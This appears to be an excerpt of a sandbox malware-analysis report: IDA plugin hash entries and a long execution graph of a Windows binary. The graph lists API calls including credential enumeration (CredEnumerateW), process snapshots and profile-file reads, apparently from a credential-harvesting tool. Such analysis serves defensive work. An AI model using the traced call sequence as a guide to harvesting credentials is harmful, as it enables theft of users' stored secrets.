                                                                                                            • API String ID: 0-2428511248
                                                                                                            • Opcode ID: 9af82810b8d4bd9cb1d6569a0628d56e88e81d2964760b022e74f856377f9fea
                                                                                                            • Instruction ID: 97c254129ad71793e84359c30746660c7a8240287e1e56f060c6b0d844af29df
                                                                                                            • Opcode Fuzzy Hash: 9af82810b8d4bd9cb1d6569a0628d56e88e81d2964760b022e74f856377f9fea
                                                                                                            • Instruction Fuzzy Hash: 5D717DB0A00205DFDB18CF98C454AAABBF2AFC8714F14C169D826AB751DB72EC41CF91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (fdl$(fdl$4al$tLVk
                                                                                                            • API String ID: 0-723379182
                                                                                                            • Opcode ID: e04db06da520b76d021af20f5ca255e5ea38f45dc4ba3f207353ce62b5f7120a
                                                                                                            • Instruction ID: d04fe3f87ce84e9f2b42c9c1593044710d6b850a096ad12f8ded15fc19873a3d
                                                                                                            • Opcode Fuzzy Hash: e04db06da520b76d021af20f5ca255e5ea38f45dc4ba3f207353ce62b5f7120a
                                                                                                            • Instruction Fuzzy Hash: 9061A0B0A09206DFD724CB54C444AAABBF2BFC5711F18C56AE4269F761CB36EC41CB91

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:5.6%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:1.8%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:76
                                                                                                            execution_graph 40277 441819 40280 430737 40277->40280 40279 441825 40281 430756 40280->40281 40282 43076d 40280->40282 40283 430774 40281->40283 40284 43075f 40281->40284 40282->40279 40295 43034a memcpy 40283->40295 40294 4169a7 11 API calls 40284->40294 40287 4307ce 40288 430819 memset 40287->40288 40296 415b2c 11 API calls 40287->40296 40288->40282 40289 43077e 40289->40282 40289->40287 40292 4307fa 40289->40292 40291 4307e9 40291->40282 40291->40288 40297 4169a7 11 API calls 40292->40297 40294->40282 40295->40289 40296->40291 40297->40282 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37966 40dd07 memset 37891->37966 37892 412827 37971 40db69 memset 37892->37971 37896 412822 37993 4125b6 ??3@YAXPAX DeleteObject 37896->37993 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37976 41268e 37898->37976 37900 412966 37994 40b1ab free free 37900->37994 37992 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37992 37905 41296f 37995 40b633 37905->37995 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37999 40a804 memset 37930->37999 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38021 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38021 38010 444722 37941->38010 37946 41259b wcscpy 37946->37886 38026 40b1ab free free 37947->38026 37949 40ad76 38027 40aa04 37949->38027 37952 40a9ce malloc memcpy free free 37954 40ac5c 37952->37954 37953 40ad4b 37953->37949 38032 40a9ce 37953->38032 37954->37949 37954->37952 37954->37953 37956 40acf0 37954->37956 37957 40ace7 free 37954->37957 38030 40a8d0 7 API calls 37954->38030 37956->37954 38031 4099f4 malloc memcpy free 37956->38031 37957->37954 37962 40ada2 37963 40adc9 37962->37963 37965 40adaa 37962->37965 37963->37891 37963->37892 37964 40adb3 _wcsicmp 37964->37963 37964->37965 37965->37963 37965->37964 38040 40dce0 37966->38040 37968 40dd3a GetModuleHandleW 38045 40dba7 37968->38045 37972 40dce0 3 API calls 37971->37972 37973 40db99 37972->37973 38117 40dae1 37973->38117 38131 402f3a 37976->38131 37978 412766 37978->37896 37978->37901 37979 4126d3 _wcsicmp 37980 4126a8 37979->37980 37980->37978 37980->37979 37982 41270a 37980->37982 38165 4125f8 7 API calls 37980->38165 37982->37978 38134 411ac5 37982->38134 37992->37907 37993->37900 37994->37905 37996 40b640 37995->37996 37997 40b639 free 37995->37997 37998 40b1ab free free 37996->37998 37997->37996 37998->37913 38000 40a83b GetSystemDirectoryW 37999->38000 38001 40a84c wcscpy 37999->38001 38000->38001 38006 409719 wcslen 38001->38006 38004 40a881 LoadLibraryW 38005 40a886 38004->38005 38005->37931 38005->37934 38007 409724 38006->38007 38008 409739 wcscat LoadLibraryW 38006->38008 38007->38008 38009 40972c wcscat 38007->38009 38008->38004 38008->38005 38009->38008 38011 444732 38010->38011 38012 444728 DeleteObject 38010->38012 38022 409cc3 38011->38022 38012->38011 38014 412551 38015 4010f9 38014->38015 38016 401130 38015->38016 38017 401134 GetModuleHandleW LoadIconW 38016->38017 38018 401107 wcsncat 38016->38018 38019 40a7be 38017->38019 38018->38016 38020 40a7d2 38019->38020 38020->37946 38020->38020 38021->37941 38025 409bfd memset wcscpy 38022->38025 38024 409cdb CreateFontIndirectW 38024->38014 38025->38024 38026->37954 38028 40aa14 38027->38028 38029 40aa0a free 38027->38029 38028->37962 38029->38028 38030->37954 38031->37956 38033 40a9e7 38032->38033 38034 40a9dc free 38032->38034 38039 4099f4 malloc memcpy free 38033->38039 38035 40a9f3 38034->38035 38038 40a8d0 7 API calls 38035->38038 38037 40a9f2 38037->38035 38038->37949 38039->38037 38064 409bca GetModuleFileNameW 38040->38064 38042 40dce6 wcsrchr 38043 40dcf5 38042->38043 38044 40dcf9 wcscat 38042->38044 38043->38044 38044->37968 38065 44db70 38045->38065 38049 40dbfd 38068 4447d9 38049->38068 38052 40dc34 wcscpy wcscpy 38094 40d6f5 38052->38094 38053 40dc1f wcscpy 38053->38052 38056 40d6f5 3 API calls 38057 40dc73 38056->38057 38058 40d6f5 3 API calls 38057->38058 38059 40dc89 38058->38059 38060 40d6f5 3 API calls 38059->38060 38061 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38060->38061 38100 40da80 38061->38100 38064->38042 38066 40dbb4 memset memset 38065->38066 38067 409bca GetModuleFileNameW 38066->38067 38067->38049 38070 4447f4 38068->38070 38069 40dc1b 38069->38052 38069->38053 38070->38069 38071 444807 ??2@YAPAXI 38070->38071 38072 44481f 38071->38072 38073 444873 _snwprintf 38072->38073 38074 4448ab wcscpy 38072->38074 38107 44474a 8 API calls 38073->38107 38076 4448bb 38074->38076 38108 44474a 8 API calls 38076->38108 38077 4448a7 38077->38074 38077->38076 38079 4448cd 38109 44474a 8 API calls 38079->38109 38081 4448e2 38110 44474a 8 API calls 38081->38110 38083 4448f7 38111 44474a 8 API calls 38083->38111 38085 44490c 38112 44474a 8 API calls 38085->38112 38087 444921 38113 44474a 8 API calls 38087->38113 38089 444936 38114 44474a 8 API calls 38089->38114 38091 44494b 38115 44474a 8 API calls 38091->38115 38093 444960 ??3@YAXPAX 38093->38069 38095 44db70 38094->38095 38096 40d702 memset GetPrivateProfileStringW 38095->38096 38097 40d752 38096->38097 38098 40d75c WritePrivateProfileStringW 38096->38098 38097->38098 38099 40d758 38097->38099 38098->38099 38099->38056 38101 44db70 38100->38101 38102 40da8d memset 38101->38102 38103 40daac LoadStringW 38102->38103 38104 40dac6 38103->38104 38104->38103 38106 40dade 38104->38106 38116 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38104->38116 38106->37896 38107->38077 38108->38079 38109->38081 38110->38083 38111->38085 38112->38087 38113->38089 38114->38091 38115->38093 38116->38104 38127 409b98 GetFileAttributesW 38117->38127 38119 40daea 38120 40db63 38119->38120 38121 40daef wcscpy wcscpy GetPrivateProfileIntW 38119->38121 38120->37897 38128 40d65d GetPrivateProfileStringW 38121->38128 38123 40db3e 38129 40d65d GetPrivateProfileStringW 38123->38129 38125 40db4f 38130 40d65d GetPrivateProfileStringW 38125->38130 38127->38119 38128->38123 38129->38125 38130->38120 38166 40eaff 38131->38166 38135 411ae2 memset 38134->38135 38136 411b8f 38134->38136 38207 409bca GetModuleFileNameW 38135->38207 38148 411a8b 38136->38148 38138 411b0a wcsrchr 38139 411b22 wcscat 38138->38139 38140 411b1f 38138->38140 38208 414770 wcscpy wcscpy wcscpy CloseHandle 38139->38208 38140->38139 38142 411b67 38209 402afb 38142->38209 38146 411b7f 38265 40ea13 SendMessageW memset SendMessageW 38146->38265 38149 402afb 27 API calls 38148->38149 38150 411ac0 38149->38150 38151 4110dc 38150->38151 38152 41113e 38151->38152 38157 4110f0 38151->38157 38290 40969c LoadCursorW SetCursor 38152->38290 38154 411143 38291 444a54 38154->38291 38294 4032b4 38154->38294 38155 4110f7 _wcsicmp 38155->38157 38156 411157 38158 40ada2 _wcsicmp 38156->38158 38157->38152 38157->38155 38312 410c46 10 API calls 38157->38312 38161 411167 38158->38161 38159 4111af 38161->38159 38162 4111a6 qsort 38161->38162 38162->38159 38165->37980 38167 40eb10 38166->38167 38180 40e8e0 38167->38180 38170 40eb6c memcpy memcpy 38171 40ebe1 38170->38171 38172 40ebb7 38170->38172 38171->38170 38173 40ebf2 ??2@YAPAXI ??2@YAPAXI 38171->38173 38172->38171 38174 40d134 16 API calls 38172->38174 38175 40ec2e ??2@YAPAXI 38173->38175 38178 40ec65 38173->38178 38174->38172 38175->38178 38190 40ea7f 38178->38190 38179 402f49 38179->37980 38181 40e8f2 38180->38181 38182 40e8eb ??3@YAXPAX 38180->38182 38183 40e900 38181->38183 38184 40e8f9 ??3@YAXPAX 38181->38184 38182->38181 38185 40e90a ??3@YAXPAX 38183->38185 38187 40e911 38183->38187 38184->38183 38185->38187 38186 40e931 ??2@YAPAXI ??2@YAPAXI 38186->38170 38187->38186 38188 40e921 ??3@YAXPAX 38187->38188 38189 40e92a ??3@YAXPAX 38187->38189 38188->38189 38189->38186 38191 40aa04 free 38190->38191 38192 40ea88 38191->38192 38193 40aa04 free 38192->38193 38194 40ea90 38193->38194 38195 40aa04 free 38194->38195 38196 40ea98 38195->38196 38197 40aa04 free 38196->38197 38198 40eaa0 38197->38198 38199 40a9ce 4 API calls 38198->38199 38200 40eab3 38199->38200 38201 40a9ce 4 API calls 38200->38201 38202 40eabd 38201->38202 38203 40a9ce 4 API calls 38202->38203 38204 40eac7 38203->38204 38205 40a9ce 4 API calls 38204->38205 38206 40ead1 38205->38206 38206->38179 38207->38138 38208->38142 38266 40b2cc 38209->38266 38211 402b0a 38212 40b2cc 27 API calls 38211->38212 38213 402b23 38212->38213 38214 40b2cc 27 API calls 38213->38214 38215 402b3a 38214->38215 38216 40b2cc 27 API calls 38215->38216 38217 402b54 38216->38217 38218 40b2cc 27 API calls 38217->38218 38219 402b6b 38218->38219 38220 40b2cc 27 API calls 38219->38220 38221 402b82 38220->38221 38222 40b2cc 27 API calls 38221->38222 38223 402b99 38222->38223 38224 40b2cc 27 API calls 38223->38224 38225 402bb0 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402bc7 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402bde 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402bf5 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402c0c 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402c23 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402c3a 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402c51 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402c68 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402c7f 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c99 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402cb3 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402cd5 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402cf0 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402d0b 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402d26 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402d3e 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402d59 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402d78 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402d93 38262->38263 38264 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38263->38264 38264->38146 38265->38136 38269 40b58d 38266->38269 38268 40b2d1 38268->38211 38270 40b5a4 GetModuleHandleW FindResourceW 38269->38270 38271 40b62e 38269->38271 38272 40b5c2 LoadResource 38270->38272 38274 40b5e7 38270->38274 38271->38268 38273 40b5d0 SizeofResource LockResource 38272->38273 38272->38274 38273->38274 38274->38271 38282 40afcf 38274->38282 38276 40b608 memcpy 38285 40b4d3 memcpy 38276->38285 38278 40b61e 38286 40b3c1 18 API calls 38278->38286 38280 40b626 38287 40b04b 38280->38287 38283 40b04b ??3@YAXPAX 38282->38283 38284 40afd7 ??2@YAPAXI 38283->38284 38284->38276 38285->38278 38286->38280 38288 40b051 ??3@YAXPAX 38287->38288 38289 40b05f 38287->38289 38288->38289 38289->38271 38290->38154 38292 444a64 FreeLibrary 38291->38292 38293 444a83 38291->38293 38292->38293 38293->38156 38295 4032c4 38294->38295 38296 40b633 free 38295->38296 38297 403316 38296->38297 38313 44553b 38297->38313 38301 403480 38511 40368c 15 API calls 38301->38511 38303 403489 38304 40b633 free 38303->38304 38305 403495 38304->38305 38305->38156 38306 4033a9 memset memcpy 38307 4033ec wcscmp 38306->38307 38308 40333c 38306->38308 38307->38308 38308->38301 38308->38306 38308->38307 38509 4028e7 11 API calls 38308->38509 38510 40f508 6 API calls 38308->38510 38311 403421 _wcsicmp 38311->38308 38312->38157 38314 445548 38313->38314 38315 445599 38314->38315 38512 40c768 38314->38512 38316 4455a8 memset 38315->38316 38324 4457f2 38315->38324 38595 403988 38316->38595 38322 4455e5 38337 445672 38322->38337 38342 44560f 38322->38342 38327 445854 38324->38327 38698 403e2d memset memset memset memset memset 38324->38698 38325 4458bb memset memset 38329 414c2e 14 API calls 38325->38329 38371 4458aa 38327->38371 38721 403c9c memset memset memset memset memset 38327->38721 38328 44595e memset memset 38332 414c2e 14 API calls 38328->38332 38333 4458f9 38329->38333 38331 445a00 memset memset 38744 414c2e 38331->38744 38340 44599c 38332->38340 38341 40b2cc 27 API calls 38333->38341 38334 44558c 38579 444b06 38334->38579 38335 44557a 38335->38334 38791 4136c0 CoTaskMemFree 38335->38791 38606 403fbe memset memset memset memset memset 38337->38606 38350 40b2cc 27 API calls 38340->38350 38351 445909 38341->38351 38353 4087b3 337 API calls 38342->38353 38344 445bca 38352 445c8b memset memset 38344->38352 38408 445cf0 38344->38408 38345 445b38 memset memset memset 38356 445bd4 38345->38356 38357 445b98 38345->38357 38346 445849 38807 40b1ab free free 38346->38807 38365 4459ac 38350->38365 38362 409d1f 6 API calls 38351->38362 38366 414c2e 14 API calls 38352->38366 38363 445621 38353->38363 38354 445585 38792 41366b FreeLibrary 38354->38792 38355 44589f 38808 40b1ab free free 38355->38808 38360 414c2e 14 API calls 38356->38360 38357->38356 38368 445ba2 38357->38368 38358 40b2cc 27 API calls 38370 445a4f 38358->38370 38373 445be2 38360->38373 38361 403335 38508 4452e5 45 API calls 38361->38508 38376 445919 38362->38376 38793 4454bf 20 API calls 38363->38793 38364 445823 38364->38346 38386 4087b3 337 API calls 38364->38386 38377 409d1f 6 API calls 38365->38377 38378 445cc9 38366->38378 38878 4099c6 wcslen 38368->38878 38369 4456b2 38795 40b1ab free free 38369->38795 38757 409d1f wcslen wcslen 38370->38757 38371->38325 38405 44594a 38371->38405 38384 40b2cc 27 API calls 38373->38384 38374 445d3d 38404 40b2cc 27 API calls 38374->38404 38375 445d88 memset memset memset 38387 414c2e 14 API calls 38375->38387 38809 409b98 GetFileAttributesW 38376->38809 38388 4459bc 38377->38388 38389 409d1f 6 API calls 38378->38389 38379 445879 38379->38355 38390 4087b3 337 API calls 38379->38390 38381 445bb3 38881 445403 memset 38381->38881 38382 445680 38382->38369 38629 4087b3 memset 38382->38629 38393 445bf3 38384->38393 38386->38364 38396 445dde 38387->38396 38874 409b98 GetFileAttributesW 38388->38874 38398 445ce1 38389->38398 38390->38379 38403 409d1f 6 API calls 38393->38403 38394 445928 38394->38405 38810 40b6ef 38394->38810 38406 40b2cc 27 API calls 38396->38406 38898 409b98 GetFileAttributesW 38398->38898 38402 40b2cc 27 API calls 38410 445a94 38402->38410 38412 445c07 38403->38412 38413 445d54 _wcsicmp 38404->38413 38405->38328 38417 4459ed 38405->38417 38416 445def 38406->38416 38407 4459cb 38407->38417 38424 40b6ef 249 API calls 38407->38424 38408->38361 38408->38374 38408->38375 38409 445389 255 API calls 38409->38344 38762 40ae18 38410->38762 38411 44566d 38411->38324 38680 413d4c 38411->38680 38420 445389 255 API calls 38412->38420 38421 445d71 38413->38421 38485 445d67 38413->38485 38415 445665 38794 40b1ab free free 38415->38794 38422 409d1f 6 API calls 38416->38422 38417->38331 38458 445b22 38417->38458 38426 445c17 38420->38426 38899 445093 23 API calls 38421->38899 38429 445e03 38422->38429 38424->38417 38425 4456d8 38431 40b2cc 27 API calls 38425->38431 38432 40b2cc 27 API calls 38426->38432 38428 44563c 38428->38415 38434 4087b3 337 API calls 38428->38434 38900 409b98 GetFileAttributesW 38429->38900 38430 40b6ef 249 API calls 38430->38361 38436 4456e2 38431->38436 38437 445c23 38432->38437 38433 445d83 38433->38361 38434->38428 38796 413fa6 _wcsicmp _wcsicmp 38436->38796 38441 409d1f 6 API calls 38437->38441 38439 445e12 38446 445e6b 38439->38446 38453 40b2cc 27 API calls 38439->38453 38444 445c37 38441->38444 38442 445aa1 38445 445b17 38442->38445 38462 445ab2 memset 38442->38462 38476 409d1f 6 API calls 38442->38476 38769 40add4 38442->38769 38774 445389 38442->38774 38783 40ae51 38442->38783 38443 4456eb 38449 4456fd memset memset memset memset 38443->38449 38450 4457ea 38443->38450 38451 445389 255 API calls 38444->38451 38875 40aebe 38445->38875 38902 445093 23 API calls 38446->38902 38797 409c70 wcscpy wcsrchr 38449->38797 38800 413d29 38450->38800 38457 445c47 38451->38457 38459 445e33 38453->38459 38455 445e7e 38461 445f67 38455->38461 38464 40b2cc 27 API calls 38457->38464 38458->38344 38458->38345 38460 409d1f 6 API calls 38459->38460 38465 445e47 38460->38465 38466 40b2cc 27 API calls 38461->38466 38467 40b2cc 27 API calls 38462->38467 38469 445c53 38464->38469 38901 409b98 GetFileAttributesW 38465->38901 38471 445f73 38466->38471 38467->38442 38468 409c70 2 API calls 38472 44577e 38468->38472 38473 409d1f 6 API calls 38469->38473 38475 409d1f 6 API calls 38471->38475 38477 409c70 2 API calls 38472->38477 38478 445c67 38473->38478 38474 445e56 38474->38446 38482 445e83 memset 38474->38482 38479 445f87 38475->38479 38476->38442 38480 44578d 38477->38480 38481 445389 255 API calls 38478->38481 38905 409b98 GetFileAttributesW 38479->38905 38480->38450 38487 40b2cc 27 API calls 38480->38487 38481->38344 38486 40b2cc 27 API calls 38482->38486 38485->38361 38485->38430 38488 445eab 38486->38488 38489 4457a8 38487->38489 38490 409d1f 6 API calls 38488->38490 38491 409d1f 6 API calls 38489->38491 38492 445ebf 38490->38492 38493 4457b8 38491->38493 38494 40ae18 9 API calls 38492->38494 38799 409b98 GetFileAttributesW 38493->38799 38504 445ef5 38494->38504 38496 4457c7 38496->38450 38497 4087b3 337 API calls 38496->38497 38497->38450 38498 40ae51 9 API calls 38498->38504 38499 445f5c 38500 40aebe FindClose 38499->38500 38500->38461 38501 40add4 2 API calls 38501->38504 38502 40b2cc 27 API calls 38502->38504 38503 409d1f 6 API calls 38503->38504 38504->38498 38504->38499 38504->38501 38504->38502 38504->38503 38506 445f3a 38504->38506 38903 409b98 GetFileAttributesW 38504->38903 38904 445093 23 API calls 38506->38904 38508->38308 38509->38311 38510->38308 38511->38303 38513 40c775 38512->38513 38906 40b1ab free free 38513->38906 38515 40c788 38907 40b1ab free free 38515->38907 38517 40c790 38908 40b1ab free free 38517->38908 38519 40c798 38520 40aa04 free 38519->38520 38521 40c7a0 38520->38521 38909 40c274 memset 38521->38909 38526 40a8ab 9 API calls 38527 40c7c3 38526->38527 38528 40a8ab 9 API calls 38527->38528 38529 40c7d0 38528->38529 38938 40c3c3 38529->38938 38533 40c7e5 38534 40c877 38533->38534 38535 40c86c 38533->38535 38961 40a706 wcslen memcpy 38533->38961 38963 40c634 49 API calls 38533->38963 38542 40bdb0 38534->38542 38964 4053fe 39 API calls 38535->38964 38538 40c813 _wcslwr 38962 40c634 49 API calls 38538->38962 38540 40c829 wcslen 38540->38533 39149 404363 38542->39149 38545 40bf5d 39169 40440c 38545->39169 38547 40bdee 38547->38545 38550 40b2cc 27 API calls 38547->38550 38548 40bddf CredEnumerateW 38548->38547 38551 40be02 wcslen 38550->38551 38551->38545 38558 40be1e 38551->38558 38552 40be26 wcsncmp 38552->38558 38555 40be7d memset 38556 40bea7 memcpy 38555->38556 38555->38558 38557 40bf11 wcschr 38556->38557 38556->38558 38557->38558 38558->38545 38558->38552 38558->38555 38558->38556 38558->38557 38559 40b2cc 27 API calls 38558->38559 38561 40bf43 LocalFree 38558->38561 39172 40bd5d 28 API calls 38558->39172 39173 404423 38558->39173 38560 40bef6 _wcsnicmp 38559->38560 38560->38557 38560->38558 38561->38558 38562 4135f7 39186 4135e0 38562->39186 38565 40b2cc 27 API calls 38566 41360d 38565->38566 38567 40a804 8 API calls 38566->38567 38568 413613 38567->38568 38569 41361b 38568->38569 38570 41363e 38568->38570 38572 40b273 27 API calls 38569->38572 38571 4135e0 FreeLibrary 38570->38571 38573 413643 38571->38573 38574 413625 GetProcAddress 38572->38574 38573->38335 38574->38570 38575 413648 38574->38575 38576 413658 38575->38576 38577 4135e0 FreeLibrary 38575->38577 38576->38335 38578 413666 38577->38578 38578->38335 39189 4449b9 38579->39189 38582 444c1f 38582->38315 38583 4449b9 42 API calls 38585 444b4b 38583->38585 38584 444c15 38586 4449b9 42 API calls 38584->38586 38585->38584 39210 444972 GetVersionExW 38585->39210 38586->38582 38588 444b99 memcmp 38593 444b8c 38588->38593 38589 444c0b 39214 444a85 42 API calls 38589->39214 38593->38588 38593->38589 39211 444aa5 42 API calls 38593->39211 39212 40a7a0 GetVersionExW 38593->39212 39213 444a85 42 API calls 38593->39213 38596 40399d 38595->38596 39215 403a16 38596->39215 38598 403a09 39229 40b1ab free free 38598->39229 38600 4039a3 38600->38598 38604 4039f4 38600->38604 39226 40a02c CreateFileW 38600->39226 38601 403a12 wcsrchr 38601->38322 38604->38598 38605 4099c6 2 API calls 38604->38605 38605->38598 38607 414c2e 14 API calls 38606->38607 38608 404048 38607->38608 38609 414c2e 14 API calls 38608->38609 38610 404056 38609->38610 38611 409d1f 6 API calls 38610->38611 38612 404073 38611->38612 38613 409d1f 6 API calls 38612->38613 38614 40408e 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4040a6 38615->38616 38617 403af5 20 API calls 38616->38617 38618 4040ba 38617->38618 38619 403af5 20 API calls 38618->38619 38620 4040cb 38619->38620 39256 40414f memset 38620->39256 38622 4040e0 38623 404140 38622->38623 38625 4040ec memset 38622->38625 38627 4099c6 2 API calls 38622->38627 38628 40a8ab 9 API calls 38622->38628 39270 40b1ab free free 38623->39270 38625->38622 38626 404148 38626->38382 38627->38622 38628->38622 39283 40a6e6 WideCharToMultiByte 38629->39283 38631 4087ed 39284 4095d9 memset 38631->39284 38634 408809 memset memset memset memset memset 38635 40b2cc 27 API calls 38634->38635 38636 4088a1 38635->38636 38637 409d1f 6 API calls 38636->38637 38638 4088b1 38637->38638 38639 40b2cc 27 API calls 38638->38639 38640 4088c0 38639->38640 38641 409d1f 6 API calls 38640->38641 38642 4088d0 38641->38642 38643 40b2cc 27 API calls 38642->38643 38644 4088df 38643->38644 38645 409d1f 6 API calls 38644->38645 38646 4088ef 38645->38646 38647 40b2cc 27 API calls 38646->38647 38648 4088fe 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 40890e 38649->38650 38651 40b2cc 27 API calls 38650->38651 38652 40891d 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 40892d 38653->38654 39303 409b98 GetFileAttributesW 38654->39303 38656 40893e 38657 408943 38656->38657 38658 408958 38656->38658 39304 407fdf 75 API calls 38657->39304 39305 409b98 GetFileAttributesW 38658->39305 38661 408964 38662 408969 38661->38662 38663 40897b 38661->38663 39306 4082c7 198 API calls 38662->39306 39307 409b98 GetFileAttributesW 38663->39307 38666 408987 38667 4089a1 38666->38667 38668 40898c 38666->38668 39309 409b98 GetFileAttributesW 38667->39309 39308 408560 29 API calls 38668->39308 38678 408953 38678->38382 38681 40b633 free 38680->38681 38682 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38681->38682 38683 413f00 Process32NextW 38682->38683 38684 413da5 OpenProcess 38683->38684 38685 413f17 CloseHandle 38683->38685 38686 413df3 memset 38684->38686 38690 413eb0 38684->38690 38685->38425 39573 413f27 38686->39573 38688 413ec8 38688->38690 39600 4099f4 malloc memcpy free 38688->39600 38689 413ebf free 38689->38690 38690->38683 38690->38688 38690->38689 38692 413e37 GetModuleHandleW 38694 413e46 GetProcAddress 38692->38694 38695 413e1f 38692->38695 38694->38695 38695->38692 39578 413959 38695->39578 39594 413ca4 38695->39594 38697 413ea2 CloseHandle 38697->38690 38699 414c2e 14 API calls 38698->38699 38700 403eb7 38699->38700 38701 414c2e 14 API calls 38700->38701 38702 403ec5 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403ee2 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 403efd 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403f15 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403f29 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403f3a 38711->38712 38713 40414f 33 API calls 38712->38713 38714 403f4f 38713->38714 38715 403faf 38714->38715 38717 403f5b memset 38714->38717 38719 4099c6 2 API calls 38714->38719 38720 40a8ab 9 API calls 38714->38720 39609 40b1ab free free 38715->39609 38717->38714 38718 403fb7 38718->38364 38719->38714 38720->38714 38722 414c2e 14 API calls 38721->38722 38723 403d26 38722->38723 38724 414c2e 14 API calls 38723->38724 38725 403d34 38724->38725 38726 409d1f 6 API calls 38725->38726 38727 403d51 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 403d6c 38728->38729 38730 409d1f 6 API calls 38729->38730 38731 403d84 38730->38731 38732 403af5 20 API calls 38731->38732 38733 403d98 38732->38733 38734 403af5 20 API calls 38733->38734 38735 403da9 38734->38735 38736 40414f 33 API calls 38735->38736 38742 403dbe 38736->38742 38737 403e1e 39610 40b1ab free free 38737->39610 38738 403dca memset 38738->38742 38740 403e26 38740->38379 38741 4099c6 2 API calls 38741->38742 38742->38737 38742->38738 38742->38741 38743 40a8ab 9 API calls 38742->38743 38743->38742 38745 414b81 9 API calls 38744->38745 38746 414c40 38745->38746 38747 414c73 memset 38746->38747 39611 409cea 38746->39611 38751 414c94 38747->38751 38750 414c64 38750->38358 38752 414cf4 wcscpy 38751->38752 39614 414bb0 wcscpy 38751->39614 38752->38750 38754 414cd2 39615 4145ac RegQueryValueExW 38754->39615 38756 414ce9 38756->38752 38758 409d43 wcscpy 38757->38758 38760 409d62 38757->38760 38759 409719 2 API calls 38758->38759 38761 409d51 wcscat 38759->38761 38760->38402 38761->38760 38763 40aebe FindClose 38762->38763 38764 40ae21 38763->38764 38765 4099c6 2 API calls 38764->38765 38766 40ae35 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 40ae49 38767->38768 38768->38442 38770 40ade0 38769->38770 38771 40ae0f 38769->38771 38770->38771 38772 40ade7 wcscmp 38770->38772 38771->38442 38772->38771 38773 40adfe 